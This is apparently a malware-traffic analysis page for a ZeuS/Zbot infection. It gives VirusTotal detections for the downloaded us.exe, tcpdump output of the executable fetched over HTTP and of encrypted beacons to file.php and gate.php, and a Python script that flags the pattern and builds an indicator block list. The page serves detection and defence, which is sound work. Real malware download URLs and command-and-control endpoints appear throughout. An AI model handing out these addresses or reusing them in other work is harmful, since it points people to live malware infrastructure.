ZeuS/Zbot traffic sample (PCAP): us.exe download, then POSTs to /demo/sites/a/file.php and /demo/sites/a/gate.php

VirusTotal result for the downloaded us.exe:
SHA256: 845fb85d4b72012d9928c0860afba60e843a7eabaf441a84e91381603c39ff87
File name: us.exe
Detection ratio: 47 / 56
Analysis date: 2016-10-26 23:42:12 UTC

Engine                   Detection                                   Updated
ALYac                    MemScan:Trojan.Spy.Zbot.FQL                 20161026
AVG                      PSW.Generic12.CIMR                          20161026
Ad-Aware                 MemScan:Trojan.Spy.Zbot.FQL                 20161026
AegisLab                 Troj.Spy.W32.Zbot!c                         20161026
AhnLab-V3                Spyware/Win32.Generic.C858104               20161026
Antiy-AVL                Trojan[Spy]/Win32.Zbot                      20161026
Arcabit                  Trojan.Spy.Zbot.FQL                         20161026
Avast                    Sf:Crypt-BR [Trj]                           20161026
Avira (no cloud)         TR/Spy.Gen                                  20161026
Baidu                    Win32.Trojan.WisdomEyes.16070401.9500.9999  20161026
BitDefender              MemScan:Trojan.Spy.Zbot.FQL                 20161027
Bkav                     W32.Clod730.Trojan.ef73                     20161026
CAT-QuickHeal            Trojan.Generic.21003                        20161026
Comodo                   TrojWare.Win32.Zbot.NEWA                    20161026
CrowdStrike Falcon (ML)  malicious_confidence_100% (W)               20160725
Cyren                    W32/Zbot.BR.gen!Eldorado                    20161027
DrWeb                    Trojan.PWS.Panda.10359                      20161027
ESET-NOD32               Win32/Spy.Zbot.AAO
(only the first 18 of the 56 engines are listed)

Captured traffic (tcpdump -A style output, 192.168.1.102 is the infected host): two fetches of us.exe over plain HTTP, then POST beacons to file.php and gate.php on design.intcomsync.com.

2016-10-26 01:14:15.132041 IP 192.168.1.102.62344 > 169.239.129.118.80: Flags [P.], seq 0:297, ack 1, win 256, length 297: HTTP: GET /scryba/files/us.exe HTTP/1.1
GET /scryba/files/us.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 169.239.129.118
Connection: Keep-Alive

2016-10-26 01:14:15.412788 IP 192.168.1.102.62344 > 169.239.129.118.80: Flags [F.], seq 297, ack 479, win 254, length 0
2016-10-26 01:14:31.777325 IP 192.168.1.102.62345 > 103.6.246.83.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: GET /music/dizi/us.exe HTTP/1.1
GET /music/dizi/us.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: intcomsync.com
Connection: Keep-Alive

2016-10-26 01:14:32.053748 IP 192.168.1.102.62345 > 103.6.246.83.80: Flags [.], ack 11489, win 256, length 0
2016-10-26 01:14:47.195433 IP 192.168.1.102.62346 > 103.6.246.83.80: Flags [P.], seq 0:371, ack 1, win 256, length 371: HTTP: POST /demo/sites/a/file.php HTTP/1.1
POST /demo/sites/a/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: design.intcomsync.com
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

[142-byte binary POST body; Zeus encrypts its C2 data, so nothing here is printable]
2016-10-26 01:14:47.200188 IP 192.168.1.102.62347 > 103.6.246.83.80: Flags [.], ack 1350356609, win 256, length 0
2016-10-26 01:14:47.200679 IP 192.168.1.102.62347 > 103.6.246.83.80: Flags [P.], seq 0:359, ack 1, win 256, length 359: HTTP: POST /demo/sites/a/file.php HTTP/1.1
POST /demo/sites/a/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: design.intcomsync.com
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

[130-byte binary POST body; Zeus encrypts its C2 data, so nothing here is printable]
2016-10-26 01:15:16.470382 IP 192.168.1.102.62353 > 103.6.246.83.80: Flags [P.], seq 0:644, ack 1, win 256, length 644: HTTP: POST /demo/sites/a/gate.php HTTP/1.1
POST /demo/sites/a/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: design.intcomsync.com
Content-Length: 415
Connection: Keep-Alive
Cache-Control: no-cache

[415-byte binary POST body; Zeus encrypts its C2 data, so nothing here is printable]
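As an added example (not code from this page or from any Zeus tooling), the following Python script parses tcpdump -A text in the format shown above, extracts each HTTP request with its headers, flags the pattern this capture shows (an .exe fetched over plain HTTP, then POSTs to .php endpoints with Accept: */*, Cache-Control: no-cache and an opaque fixed-length body, all sharing the same MSIE 8.0 / Windows NT 5.1 User-Agent) and collects the IOCs for a block list. The SAMPLE string is a constructed excerpt of the capture on this page with the binary bodies omitted; the regular expressions, the HttpRequest class and the rule wording are my own assumptions about the text format, not anything the page defines.

```python
"""Pull HTTP requests out of tcpdump -A text and flag the Zbot-style
download-then-beacon pattern seen in this capture (added example, not page code)."""
import re
from dataclasses import dataclass, field

# Packet summary line that ends in an HTTP request line (format assumed from the page).
SUMMARY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP \d+(?:\.\d+){3}\.\d+ > "
    r"(?P<dst>\d+(?:\.\d+){3})\.\d+: .*HTTP: (?P<method>GET|POST) (?P<path>\S+) HTTP/1\.[01]$")
HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z-]*): (.*)$")
ZBOT_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"


@dataclass
class HttpRequest:
    ts: str
    dst: str          # server IP taken from the packet header
    method: str
    path: str
    headers: dict = field(default_factory=dict)

    @property
    def host(self) -> str:
        return self.headers.get("Host", self.dst)

    @property
    def url(self) -> str:
        return f"http://{self.host}{self.path}"


def parse_tcpdump(text: str) -> list:
    """One HttpRequest per packet whose summary line carries a request line."""
    reqs, cur = [], None
    for line in text.splitlines():
        if line[:4].isdigit() and " IP " in line:   # any packet summary line
            m = SUMMARY_RE.match(line)
            cur = HttpRequest(m["ts"], m["dst"], m["method"], m["path"]) if m else None
            if cur:
                reqs.append(cur)
        elif cur is None or not line.strip():        # blank line closes the header block
            cur = None
        elif (h := HEADER_RE.match(line)):
            cur.headers[h.group(1)] = h.group(2)
    return reqs


def classify(req: HttpRequest) -> list:
    """Reasons a request matches the traffic on this page (empty list = no hit)."""
    reasons, h = [], req.headers
    if req.method == "GET" and req.path.lower().endswith(".exe"):
        reasons.append("executable fetched over plain HTTP")
        if re.fullmatch(r"\d+(?:\.\d+){3}", req.host):
            reasons.append("Host header is a bare IP address")
    if req.method == "POST" and req.path.endswith(".php"):
        if h.get("Accept") == "*/*" and h.get("Cache-Control") == "no-cache" and "Content-Length" in h:
            reasons.append("POST to .php with Accept: */*, Cache-Control: no-cache and a fixed-length body")
        if req.path.endswith("/gate.php"):
            reasons.append("gate.php is the Zeus C2 drop-zone name")
    if h.get("User-Agent") == ZBOT_UA:
        reasons.append("MSIE 8.0 / Windows NT 5.1 User-Agent used by every request in the capture")
    return reasons


def analyze(text: str) -> dict:
    """Map each request URL to its hit reasons and collect IOCs for blocking."""
    reqs = parse_tcpdump(text)
    hits = {r.url: classify(r) for r in reqs}     # repeated beacons to one URL collapse here
    iocs = {"ips": sorted({r.dst for r in reqs}),
            "hosts": sorted({r.host for r in reqs}),
            "urls": sorted(hits)}
    return {"hits": hits, "iocs": iocs}


# Constructed excerpt of the capture on this page: summary lines and headers only, bodies omitted.
SAMPLE = """\
2016-10-26 01:14:15.132041 IP 192.168.1.102.62344 > 169.239.129.118.80: Flags [P.], seq 0:297, ack 1, win 256, length 297: HTTP: GET /scryba/files/us.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: 169.239.129.118

2016-10-26 01:14:31.777325 IP 192.168.1.102.62345 > 103.6.246.83.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: GET /music/dizi/us.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: intcomsync.com

2016-10-26 01:14:47.195433 IP 192.168.1.102.62346 > 103.6.246.83.80: Flags [P.], seq 0:371, ack 1, win 256, length 371: HTTP: POST /demo/sites/a/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: design.intcomsync.com
Content-Length: 142
Cache-Control: no-cache

2016-10-26 01:15:16.470382 IP 192.168.1.102.62353 > 103.6.246.83.80: Flags [P.], seq 0:644, ack 1, win 256, length 644: HTTP: POST /demo/sites/a/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: design.intcomsync.com
Content-Length: 415
Cache-Control: no-cache
"""

if __name__ == "__main__":
    result = analyze(SAMPLE)
    for url, reasons in result["hits"].items():
        print(url, "->", "; ".join(reasons) or "clean")
    print("block list:", result["iocs"])
```

Run it as-is to see the per-URL reasons and the IOC lists; to run it on the real capture, feed analyze() the output of `tcpdump -A -r sample.pcap 'tcp port 80'`. The rules are deliberately narrow matches on what this sample does, so treat them as a starting point rather than production detection logic: the bare-IP Host check and the gate.php name are the ones that carry over best, while the User-Agent string will drift between builds.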